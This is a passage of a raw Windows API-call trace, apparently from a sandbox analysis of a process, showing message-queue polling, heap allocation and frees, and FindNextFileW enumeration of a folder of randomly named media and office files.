lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.923] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.923] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.923] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.923] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf757460, ftCreationTime.dwHighDateTime=0x1d5ea1b, ftLastAccessTime.dwLowDateTime=0x8c4b4d70, ftLastAccessTime.dwHighDateTime=0x1d5e21a, ftLastWriteTime.dwLowDateTime=0x8c4b4d70, ftLastWriteTime.dwHighDateTime=0x1d5e21a, nFileSizeHigh=0x0, nFileSizeLow=0x166f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="af0Z-.flv", cAlternateFileName="")) returned 1 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0216.924] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9a0ef00, ftCreationTime.dwHighDateTime=0x1d5e235, ftLastAccessTime.dwLowDateTime=0x2673a800, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0x2673a800, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x3f24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATHv.mp4", cAlternateFileName="")) returned 1 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6857e010, ftCreationTime.dwHighDateTime=0x1d5f05a, ftLastAccessTime.dwLowDateTime=0xc7b46ee0, ftLastAccessTime.dwHighDateTime=0x1d5efa9, ftLastWriteTime.dwLowDateTime=0xc7b46ee0, ftLastWriteTime.dwHighDateTime=0x1d5efa9, nFileSizeHigh=0x0, nFileSizeLow=0x14995, dwReserved0=0x0, dwReserved1=0x0, cFileName="bbPMuZmaU.xlsx", cAlternateFileName="BBPMUZ~1.XLS")) returned 1 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.014] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9914c70, ftCreationTime.dwHighDateTime=0x1d5e76a, ftLastAccessTime.dwLowDateTime=0xcfd04670, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0xcfd04670, ftLastWriteTime.dwHighDateTime=0x1d5f054, nFileSizeHigh=0x0, nFileSizeLow=0x2317, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfVxZ90.avi", cAlternateFileName="")) returned 1 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbd63b0, ftCreationTime.dwHighDateTime=0x1d5e3da, ftLastAccessTime.dwLowDateTime=0x53cd0620, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x53cd0620, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x24f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BTjJSlc2bP-ki.swf", cAlternateFileName="BTJJSL~1.SWF")) returned 1 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.060] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 1 [0217.138] TranslateMessage (lpMsg=0x8cf618) returned 0 [0217.138] DispatchMessageW (lpMsg=0x8cf618) returned 0x0 [0217.138] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0217.138] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.138] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0217.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0217.138] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.138] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe9afe0, ftCreationTime.dwHighDateTime=0x1d5e841, ftLastAccessTime.dwLowDateTime=0xd1a4d120, ftLastAccessTime.dwHighDateTime=0x1d5e7c9, ftLastWriteTime.dwLowDateTime=0xd1a4d120, ftLastWriteTime.dwHighDateTime=0x1d5e7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f91, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTe6ly.avi", cAlternateFileName="")) returned 1 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.139] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.139] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0217.139] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0217.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x230) returned 0x9785a8 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.140] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.140] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.140] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a1a40, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0xe8b26ce0, ftLastAccessTime.dwHighDateTime=0x1d5ec94, ftLastWriteTime.dwLowDateTime=0xe8b26ce0, ftLastWriteTime.dwHighDateTime=0x1d5ec94, nFileSizeHigh=0x0, nFileSizeLow=0x5116, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dm2KF.flv", cAlternateFileName="")) returned 1 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0217.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.140] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.141] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0217.141] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.141] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.141] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0217.142] FindNextFileW (in: hFindFile=0xa87710, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaf3ebe0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x1c2cf1e0, ftLastAccessTime.dwHighDateTime=0x1d5e4ec, ftLastWriteTime.dwLowDateTime=0x1c2cf1e0, ftLastWriteTime.dwHighDateTime=0x1d5e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x13541, dwReserved0=0x0, dwReserved1=0x0, cFileName="DS6Dq4b7eKkPU5JH.mp3", cAlternateFileName="DS6DQ4~1.MP3")) returned 1 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0217.142] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.142] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0217.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0217.142] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0217.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0217.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 